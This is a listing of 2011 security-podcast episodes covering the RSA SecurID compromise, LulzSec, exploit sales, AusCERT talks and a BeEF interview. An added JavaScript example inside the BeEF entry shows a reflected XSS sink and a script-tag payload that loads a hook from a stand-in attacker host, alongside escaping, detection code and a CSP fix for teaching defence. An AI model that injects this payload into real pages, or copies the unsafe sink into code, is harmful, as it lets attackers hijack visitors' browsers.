RSA confirms SecurID tokens make nice earrings...
June 10th, 2011 --
In this week's feature interview we're chatting with Neal Wise of Assurance.com.au about RSA's decision to finally admit what we all knew already -- that its SecurID product line has been compromised. RSA is offering to replace tokens... we'll chat with Neal about whether it will make sense to do that or not. In this week's sponsor interview we're joined by Astaro's director of Support Alan Toews. We're talking about the silver lining to all the chaos out there at the moment -- does the awareness raised by the actions of groups like LulzSec offset the harm they cause to their victims?
Elephant in room visible. Cans open. Worms everywhere...
June 8th, 2011 --
Although large sections of the security community will deny it if you ask them, they're secretly enjoying watching LulzSec's campaign of mayhem unfold. So far the "hacker group" has penetrated systems owned by Sony, PBS, the "FBI affiliate site" Infragard, security company (hah!) Unveillance and Nintendo, among others.
Why oh why is infosec software full of bugs?
June 2nd, 2011 --
On this week's show we're taking a look at the issue of failkit. Why is it that the very software designed to keep our networks secure is full of bugs? A pen tester buddy of mine recently found an 0day XSS in a single sign on product... on ITS FRONT PAGE. Another friend found an auth bypass in a two-factor authentication management console. ON ITS FRONT PAGE. It's impossible to find AV engines that don't come preloaded with a zillion format string vulnerabilities, and as you'll hear in this week's news, even Cisco's VPN solution is a nice way to actually own organisations. WTF.
Most weaponised exploits now sold to governments, HD Moore says...
May 26th, 2011 --
On this week's show we're chatting with HD Moore all about a recent decision by research house VUPEN to refuse to share their research into Chrome vulnerabilities with Google. The French group likely sells 0days to governments, militaries and intelligence agencies to use on offensive operations -- so of course sharing its exploit information wouldn't make much sense for them. But what does this mean? Will we see any bugs in the open anymore? Or will they all go underground and be sold to governments?
Day three keynote from the AusCERT conference... good stuff...
May 24th, 2011 --
This is a full presentation by AusCERT's day three keynote speaker Ross Anderson. Ross has kindly allowed us to podcast his entire talk. Ross is professor of security engineering at Cambridge University, and author of the bestselling textbook "Security Engineering: A Guide to Building Dependable Distributed Systems". He was a pioneer of peer-to-peer systems, of hardware tamper-resistance, and of the economics of information security.
Many impact scores exist. How does Microsoft figure out its ratings?
May 24th, 2011 --
Microsoft was kind enough to sponsor our coverage of AusCERT's 2011 conference and as a part of that sponsorship arrangement we're doing these sponsored podcasts. We've already posted two interviews with Microsoft peeps about security issues, but we're posting this full talk as well. Maarten Van Horenbeeck works in the Microsoft Security Response Center managing Microsoft's efforts to share information on security vulnerabilities with third party security software providers, government agencies and national CERT teams.
Shameless self promotion begins below...
May 23rd, 2011 --
Tony Oliver and the Pubcast crew interviewed me about the talk I did at ITWeb's Security Summit in South Africa the other week. My talk was all about militarisation trends in the digital security field. I drew parallels between the Cold War and what's happening now. You can find it here. Thanks to Tony and the rest of his gang for having me on their show. It's good to be on the other end of an interview every now and then!
It turns out routing tables lie more than politicians...
May 20th, 2011 --
This podcast is a complete presentation by APNIC's Geoff Huston. According to the official synopsis: "This presentation will outline the role of addresses and routing and the potential attack vectors, and will also report on the progress to establish a secure framework for addresses and their use in the Internet, highlighting the progress in establishing a secure routing environment for the Internet." As regular RB listeners would know, we've followed APNIC's work and papers in this area and they have a habit of pushing out good stuff... so this should be a decent talk. Enjoy!
AusCERT's speed debates back in 2011!
May 20th, 2011 --
You're about to hear one of the highlights of AusCERT's annual conference -- the speed debates! Not to be taken too seriously, the speed debate happens at the end of the con -- it's a chance to have a laugh and shed some lighter perspectives on the security discipline. It's hosted by Australian broadcaster and journalist Adam Spencer. I hope you enjoy it.
PSN breach keeps enterprise customers up at night...
May 20th, 2011 --
Microsoft was kind enough to sponsor our coverage of AusCERT's 2011 conference and as a part of that sponsorship arrangement we're doing these sponsored podcasts. They're general chats with Microsoft peeps about security issues. In this interview we're chatting with Microsoft Australia's Chief Security Advisor Stuart Strathdee about the effect the PlayStation Network (PSN) breach has had on large organisations' security outlook. As you'll hear, Stuart says a lot of security projects that had been on the back burner are now being brought forward. Enjoy!
Ben Grubb's iPad should not have been seized...
May 19th, 2011 --
The publication of allegedly stolen, private photographs by Fairfax Online was eclipsed in stupidity only by the QLD Police Service's decision to seize the iPad of journalist Ben Grubb at the AusCERT conference on Tuesday. Every time the coppers raid media organisations to seize computers and documents in order to track down, say, the source of an embarrassing political leak, it pisses me off something awful. The lack of respect shown to the media and its sources by governments in this country, both state and federal, is pretty astonishing.
Incredible feat performed live at AusCERT 2011...
May 18th, 2011 --
You're about to hear a full presentation recorded at the AusCERT conference: a great presentation by Mark Newton, an engineer with Internode, all about IPv6 security. Internode is an ISP and Mark really knows his stuff. We all know security considerations in IPv6 aren't exactly thrilling, but Mark managed to actually make this presentation interesting and a little bit thought provoking. I was popping in and out throughout this session and yeah, it was definitely more interesting than I was expecting. So here it is!
Scott's always good for a laugh!
May 18th, 2011 --
You're about to hear a full presentation recorded at the AusCERT conference. Scott McIntyre is a recent immigrant to Australia... he used to work for XS4all in the Netherlands, but these days he works as the Senior Technology Architecture Specialist in Security Operations for Telstra in Melbourne. His presentation is all about his views though, not those of Telstra. Disclaimer. Etc.
What is hip... tell me tell me if you think you know...
May 18th, 2011 --
Our coverage of the conference is brought to you by the fine folks at Microsoft -- without their support, there would be no AusCERT podcasts, so big thanks to MS!
It's all just a bit out of control...
May 18th, 2011 --
Well, hasn't this been an interesting AusCERT... If you haven't heard by now, Fairfax IT journalist Ben Grubb was briefly detained by QLD police yesterday afternoon in connection with a BSides Australia security presentation delivered on Sunday. The presentation, by Christian Heinrich, demonstrated a brute-force attack against Facebook's content distribution network. I didn't see the presentation myself, but the long and short of it is that the vulnerability demonstrated allows an attacker to obtain Facebook users' private photos. So how did the police become involved?
Where's the BeEF, chief?
May 16th, 2011 --
In this interview we're chatting with Wade Alcorn. By day he's NGS Security's general manager for Asia Pacific, but by night he's out there maintaining BeEF -- the Browser Exploitation Framework. If you haven't heard of BeEF, it's a very cool tool. If you can get someone to load its hook script into their browser, either by them visiting a site you control directly or via some sort of cross site scripting bug, then you can get that browser to do all sorts of stuff for you -- like portscan the victim's LAN, attack JBoss servers and stuff like that.
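As an added illustration of the delivery vector Wade describes (this is example code written for this page, not BeEF's own code, and the hook URL and site origin are hypothetical): a reflected XSS sink that lets an attacker splice in a script tag pointing at a host they control, the same sink with output escaping, and a small check for off-origin script sources that a reviewer or scanner would run over the rendered page.

```javascript
// Added example, not part of BeEF or the original page.
// HOOK_URL is a hypothetical attacker-controlled host.
const HOOK_URL = "https://attacker.example/hook.js";

// Vulnerable: untrusted input is spliced straight into HTML, so a
// reflected parameter becomes markup, including <script> tags.
function renderGreetingUnsafe(name) {
  return `<p>Hello, ${name}!</p>`;
}

// Hardened: escape the characters that change meaning in an HTML text
// context before interpolating.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  })[c]);
}
function renderGreetingSafe(name) {
  return `<p>Hello, ${escapeHtml(name)}!</p>`;
}

// The attacker's payload does nothing clever on its own: it just drags
// a script from the attacker's host into the victim's page. Once that
// script runs, the browser is the attacker's foothold on the LAN.
const HOOK_PAYLOAD = `<script src="${HOOK_URL}"></script>`;

// Check: which <script src=...> references in the rendered HTML point at
// an origin other than the site's own? Returns the raw src values found.
function externalScriptSources(html, siteOrigin) {
  const found = [];
  const re = /<script[^>]*\ssrc\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    let origin;
    try {
      origin = new URL(m[1], siteOrigin).origin;
    } catch {
      continue; // unparsable src, ignore it
    }
    if (origin !== siteOrigin) found.push(m[1]);
  }
  return found;
}

// Defence in depth: a policy like this makes the browser refuse
// off-origin scripts even if an injection slips past the escaping.
const CSP_HEADER =
  "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'";

// Stand-alone run against a hypothetical site origin.
const SITE = "https://victim.example";
console.log(externalScriptSources(renderGreetingUnsafe(HOOK_PAYLOAD), SITE));
console.log(externalScriptSources(renderGreetingSafe(HOOK_PAYLOAD), SITE));
console.log(CSP_HEADER);
```

The escaping fixes this one sink in a text context; attribute, URL and JavaScript contexts need their own encoders, and the CSP header is the backstop for the sinks you missed.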
Is Smart Grid security stupid?
May 16th, 2011 --
This podcast is an AusCERT talk by Ian Appleby. He's the Information Security Manager at Endeavour Energy and he's responsible for the security of its Corporate and SCADA Systems. The talk is on Risk Management in a Smart Metering Environment.
Man of mystery joins Risky Business...
May 16th, 2011 --
In this interview we hear from Tim Hudson, an independent cryptography dude, who, as you'll hear, may or may not have worked on Queensland's smart card driver's licence project. Absurdly, on legal advice, he can't actually tell us if he worked on that project. There were mutterings in the Queensland state parliament some time ago about a project consultant criticising the rollout... the minister responsible also said something about the department exploring legal options to shut said critic up. Geez, I wonder if it was Tim?
He didn't write Stuxnet. Honest.
May 16th, 2011 --
You're about to hear a presentation by Jason Larsen, a security researcher at the Idaho National Laboratory. The INL is run by the US Department of Energy and is home to the National SCADA Testbed (NSTB) and the Industrial Control System CERT (ICS-CERT).
Comedian and ID theft victim Bennett Arron entertains at AusCERT...
May 16th, 2011 --
You're about to hear an excerpt from the opening keynote of the AusCERT conference by comedian Bennett Arron. Several years ago Bennett Arron was in serious debt. He owed thousands of pounds to mobile phone companies, catalogues and department stores. But it wasn't him! As it turned out, he was a victim of identity theft. Years later, he wound up writing a comedy show about his experience... he eventually directed and presented a documentary for Channel 4 called How To Steal An Identity. In it he actually stole the identity of the then Home Secretary, Charles Clarke.